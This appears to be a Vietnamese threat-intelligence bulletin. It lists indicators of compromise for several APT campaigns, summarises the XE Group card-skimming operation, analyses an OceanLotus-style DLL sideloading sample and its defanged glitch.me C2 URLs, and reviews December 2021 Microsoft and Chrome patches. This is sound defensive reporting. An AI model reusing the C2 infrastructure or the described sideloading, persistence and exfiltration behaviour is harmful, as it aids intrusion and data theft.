8f79333f2cc38d2259af81b6d0fbfb0731f1e3442c187b19a6538d0e7daf85df

c2dbaafccfb8c9121904629c1b643b99dfa934a2ec9f4bd8754ba3cad38b9a90

7a3d7f1dc1e5d42e278785149a382651c70a8f967a153e1960cffff5f92eaa33

6543180ba4e195b4f80399aae593eb7554588b61e651fce81b91fefa56baec30

4ac3836414a384aee4c68e60eca54a848c8727a9e548de2b7ab76ecbd520107a

9d0c2e8d0e2430c3e67b2677caff136e562570da162a371e9cfa6602c70b03bb

c94d6649fe5c879ac2e4ccb313958736ac4c86f217c3a68c799f9641b6ac9f2a

a1859ce1575ab08b6c3dc2731cef31e358dd3ccfc7d6febaccb6a730bc1d58c0

179d18ad80b718d861ea0b4b06ad885e0a7760051497db6eb87315f92dd24b53

b3c811595a0edbed9524a1a71ee9292c19792370c99f856f765a39f80a437418

d12582262c06d6e0f68c62c891f469d819e18e0498fa2e9d277981f25eee93a1

 

TAG-33 Laos Campaign

ShadowPad, Cobalt Strike, and Trochilus C2 Infrastructure

laodailylive[.]com

laodiplomat[.]com

api.dreamsbottle[.]com

news.networkslaoupdate[.]com

laodata[.]network

laotranslations[.]com

193.56.255[.]225

139.99.22[.]94

RoyalRoad

130daacff74d57bb2319fc5cf815e783c6505883f69e4adcd4c2b1cac3e598ce

Newcore RAT

207e66a3b0f1abfd4721f1b3e9fed8ac89be51e1ec13dd407b4e08fad52113e3

Cobalt Strike

47b12169eb9933b8481327a9775d1efd4fa077881f023892938056ff06e4f2b4

 

TAG-34 Cambodian Campaign

ShadowPad C2 IP Addresses & Associated Domains:

nbabbpdbqljf[.]com

www.nbabbpdbqljf[.]com

iherlvufjknw[.]com

ja.iherlvufjknw[.]com

www.iherlvufjknw[.]com

musicandfile[.]com

www.musicandfile[.]com

cm.musicandfile[.]com

duutsxlydw[.]com

news.duutsxlydw[.]com

office.duutsxlydw[.]com

43.129.41[.]169

43.129.36[.]175

152.32.153[.]189

XE Group – Nhóm tấn công đến từ Việt Nam thực hiện hacking và card skimming

Volexity cung cấp thông tin về nhóm tấn công XE Group, được cho là đến từ Việt Nam, chuyên thực hiện các hoạt động hacking và card skimming trong năm 2020 và 2021. Các hoạt động chính của XE Group bao gồm:

  • Tấn công xâm nhập, chiếm quyền các hệ thống dịch vụ puclic Internet qua các lỗ hổng bảo mật đã biết (Ví dụ như các lỗ hổng của Telerik UI)

  • Cài đặt các đoạn mã thực hiện đánh cắp mật khẩu hoặc rà quét thẻ tín dụng (credit card skimming) trên các ứng dụng web của các máy chủ đã bị xâm nhập

Các hoạt động của XE Group được phát hiện đầu tiên bởi Malwarebytes vào năm 2020, và đến 2021, Volexity thực hiện điều tra, phân tích sâu hơn cơ sở hạ tầng của nhóm này sau khi phát hiện ra các hoạt động tấn công mới của nhóm. Các mẫu malware thu thập được đều thuộc họ malware mà nhóm đặt là “XEReverseShell”, phần lớn được viết bằng .NET và AutoIT, ngoài ra 1 số mẫu loaders được viết bằng C++.

Hoạt động thu lợi chính của nhóm là credit card skimming. Bên cạnh những điểm tương tự như trong phân tích của Malwarebytes năm 2020, các đoạn mã thực hiện card skimming mới được phát hiện có 1 số điểm khác biệt:

  • Sử dụng thêm “.join()” và “.replace()” để rebuild obfuscated strings

  • Sử dụng kỹ thuật khác để obfuscate domain name trong script

  • Sử dụng các nhóm từ và các số ngẫu nhiên để tạo ngẫu nhiên URI dùng để gửi các dữ liệu lấy được

  • Loại bỏ chức năng tìm kiếm mật khẩu, bổ sung 1 số đoạn script kiểm tra trước khi chạy các chức năng chính

  • Sử dụng các kí tự dấu phẩy và dấu ngã để đánh dấu các cặp giá trị key dùng cho encode

Các trang web bị tấn công thuộc nhiều lĩnh vực khác nhau: du lịch, nhà hàng, nghệ thuật, văn hóa, phi lợi nhuận, cho thấy hoạt động tấn công trên diện rộng và không phân biệt mục tiêu cụ thể của XE Group.

Dựa trên các kết quả phân tích và tìm kiếm, Volexity tin rằng XE Group đến từ Việt Nam: 

  • Các thông tin WHOIS về các malicious domains thuộc 1 cá nhân tại Việt Nam với tên “Joe Nguyen”

  • Điều tra sâu về “Joe Nguyen”, các chuyên gia phát hiện 1 profile trên Youtube và 1 repository trên Github với username “xethanh”, ngoài ra “xethanh” cũng từng xuất hiện trên các diễn đàn mua bán, trao đổi thẻ.

Indicators of Compromise (IoCs)

Thông tin đầy đủ về IoCs xem tại: https://github.com/Volexity /threat-intel/blob/main/2021/2021-12-06%20-%20XEGroup/indicators/indicators.csv

 

Malware 

Phân tích mẫu mã độc sử dụng kỹ thuật obfuscation liên quan tới nhóm OceanLotus

Gần đây, Qi’anxin Red Raindrop team đã thu thập được mẫ mã độc sử dụng các kỹ thuật obfuscation tương tự như các mẫu mã độc mà nhóm APT OceanLotus sử dụng. Mẫu mã độc thu thập được có những đặc điểm sau:

  • DLL độc hại và các components sử dụng cùng phương pháp obfuscation làm khó khăn trong quá trình phân tích

  • C2 service sử dụng nền tảng Glitch

  • Mã độc tải xuống thêm các payload mới từ C2 và thực thi 

Thông tin mã độc:

MD5

File type

079af508cee29a0dd09d9dace2b7ac38

RAR

1dbd3e88bc5cb77a7401cb49b44f554e

DLL

ed77d96226a262a4cac4807e4355257a

DLL

ec44a1e0f5af1c4bd3f308ff1b3fc879

DLL

 

Cơ chế obfuscation:

Dữ liệu tại data segment được so sánh với immediate data thông qua lệnh cmp/test, theo sau là lệnh nhảy có điều kiện (conditional jump). OceanLotus đã từng sử dụng cách thức này để obfuscate code trong các cuộc tấn công được theo dõi trước đây. Việc chèn một số lượng lớn các lệnh khiến binary code trở nên phức tạp, khiến các công cụ phân tích như IDA không thể phân tích binarycode được kết quả đẹp

Phân tích mẫu:

Trong file nén RAR này chứa file WinWord có chữ ký của Microsoft, được sử dụng để load DLL và DLL độc hại

Sau khi thực thi file .exe, tài liệu giả mạo sẽ được hiển thị mà không có nội dung cụ thể

 

MSVCR100.dll

DLL là dropper, nén trong DLL là 3 PE file và một tài liệu docx giả mạo

Khi .exe được thực thi, DLL độc hại nằm cùng thư mục sẽ được load, export function _initterm_e sẽ được thực thi. Nó tạo một thư mục tại đường dẫn C:\\ProgramData\\MicrosoftMessenge\ và tạo các thư mục con lần lượt là 4keanigb, bpvefocccyk33yqhMỗi lần tạo thư mục con, mã độc sao chép file exe(WinWord.exe) vào thư mục con, tên file được đặt giống tên thư mục và drop các dll tương ứng vào các thư mục con này 

Thiết lập time task thông qua COM object, tên của task là “MS Messenge” 

Bpvefocc component

Chính năng chính của dll trong thư mục bpvefocc như sau :

  • Tìm đường dẫn của exe để load DLL, tìm thư mục cha C: \\ ProgramData \\ MicrosoftMessenge \\". Truy vấn tất cả các tiến trình đang chạy

  • Duyệt qua từng thư mục con trong thư mục cha, nếu không tìm thấy tệp exe trong mỗi thư mục con đang được thực thi, gọi tới hàm CreateProcessW

4keanigb component

DLL độc hại thu thập thông tin hệ thống, phần cứng, tên máy tính, tên người dung, tên các tệp và thư mục con trong Program Files và Program File(x86). Thôn tin thu thập được sẽ được mã hóa và gửi tới C2 server thông qua POST request được base64 encoding

Sau khi gửi thông tin đến C2, component sleep 360s, chờ cyk33yqh component tải xuống payload mới từ C2 với định dạng 7z. Sau quá trình sleep, mã độc tìm file chứa định dạng 7z lưa trong thư mục C: \\ ProgramData \\ MicrosoftMessenge \\, giải nèn và thực hiện các nhiệm vụ khác.

cyk33yqh component

Chức năng chính của dll trong mục cyk33yqh là tải xuống payload mới được nén ở định dạng 7z từ C2 từ địa chỉ hxxps://gifted-boulder-transport.glitch.me/Zqw4D2. Do thời điểm phân tích, C2 không còn hoạt động nên không thể phân tích thêm

Indicators of Compromise (IoCs):

MD5

079af508cee29a0dd09d9dace2b7ac38

1dbd3e88bc5cb77a7401cb49b44f554e

7ccae006a305efeff74b9be596abbb56

fed42946a526d3985e3d03b9b9d71b7b

c7b6c3eedb55f4f2170ece002c45091c

ed77d96226a262a4cac4807e4355257a

aa792a76817968f2731eaeb325b7054

3f5d27a867d30f922bc07d03eb8d2bda

d40bca7bd450e3cf4b825044f57b4b9d

ec44a1e0f5af1c4bd3f308ff1b3fc879

b9238fd15f659837a8ae7764d4fcdfc1

23123badbfe3f18420d434d9c979788b

134fa927d2a49f9ab2a557cf31f0b4d8

URL

hxxps://gifted-boulder-transport.glitch.me/HrwQA1

hxxps://gifted-boulder-transport.glitch.me/Zqw4D2

hxxps://river-cliff-crate.glitch.me/T713P

hxxps://river-cliff-crate.glitch.me/T713D

hxxps://cooperative-supreme-pisces.glitch.me/T713P

hxxps://cooperative-supreme-pisces.glitch.me/T713D

CVE và các khuyến nghị bảo mật

Microsoft Patch Tuesday – December 2021 

Vào tháng 12/2021, Microsoft đã phát hành các bản vá cho 83 CVE mới trong các sản phẩm của Microsoft như Microsoft Windows, Windows Components, ASP.NET Core và Visual Studio, Azure Bot Framework SDK, Internet Storage Name Service, Defender for IoT, Edge (dựa trên Chromium), Microsoft Office, Máy chủ SharePoint…

Trong số này, 7 CVE được đánh giá là Nghiêm trọng và 60 CVE được đánh giá về mức độ nghiêm trọng là Improtant.

Dưới đây là một số CVE nổi bật:

CVE-2021-43907- Visual Studio Code WSL Extension Remote Code Execution Vulnerability

 

CVSS v3.0: 9.8

Mô tả: Lỗ hổng tồn tại trên thành phần WSL(Windows Subsytem for Linux) được sử dụng để chạy môi trường Linux trên hệ điều hành Windows. Lỗ hổng cho phép kẻ tấn công thực thi mã tùy ý mà không cần xác thực và tương tác từ người dùng

Hệ thống bị ảnh hưởng: 

Visual Studio Code WSL Extension

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng. 

CVE-2021-42309 – Microsoft SharePoint Server Remote Code Execution

CVSS v3.0: 8.8

Mô tả: Lỗ hổng cho phép kẻ tấn công thực thi mã tùy ý tên máy chủ. Điều kiện để khai thác lỗ hổng, kẻ tấn công cần có tài khoản Sharepoint với quyền sử dụng tính năng Manage Lists. 

Hệ thống bị ảnh hưởng: 

Microsoft SharePoint Foundation 2013 Service Pack 1

Microsoft SharePoint Server Subscription Edition

Microsoft SharePoint Server 2019

Microsoft SharePoint Enterprise Server 2016

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng. 

 

CVE-2021-43890 - Windows AppX Installer Spoofing Vulnerability

CVSS v3.0: 7.1

Mô tả: Lỗ hổng tồn tại trên Windows Appx Instaleer, theo ghi nhận của Microsoft, lỗ hổng này đã được những nhóm tấn công lợi dụng khai thác. Bằng cách tạo ra các phần mềm độc hại đã biết như Emotet/Trickbot/Bazaloader. Thông qua hình thức phishing, kẻ tấn công sẽ đính kèm các tệp tin độc hại và lừa người dùng mở để khai thác lỗ hổng.

Hệ thống bị ảnh hưởng: 

App Installer

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng. 

 

Ứng dụng web các sản phẩm khác

Google có công bố bản cập nhật 96.0.4664.110 cho Google Chrome nhằm vá 1 lỗ hổng ở mức Nghiêm trọng và 4 lỗ hổng được đánh giá ở mức độ Đáng chú ý lỗ hổng sau

CVE-2021-4102 Use after free in V8

Mô tả: Khai thác lỗ hổng UAF (Use after free) trong V8, Google ghi nhận lỗ hổng đang được các nhóm tấn công lợi dụng để khai thác

Phiên bản ảnh hưởng

Chromium Version 96.0.4664.110

Microsoft Edge Version 96.0.1054.57

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng. 

 

 

 

Các gói dịch vụ

Liên hệ

Name
Email
Phone
Message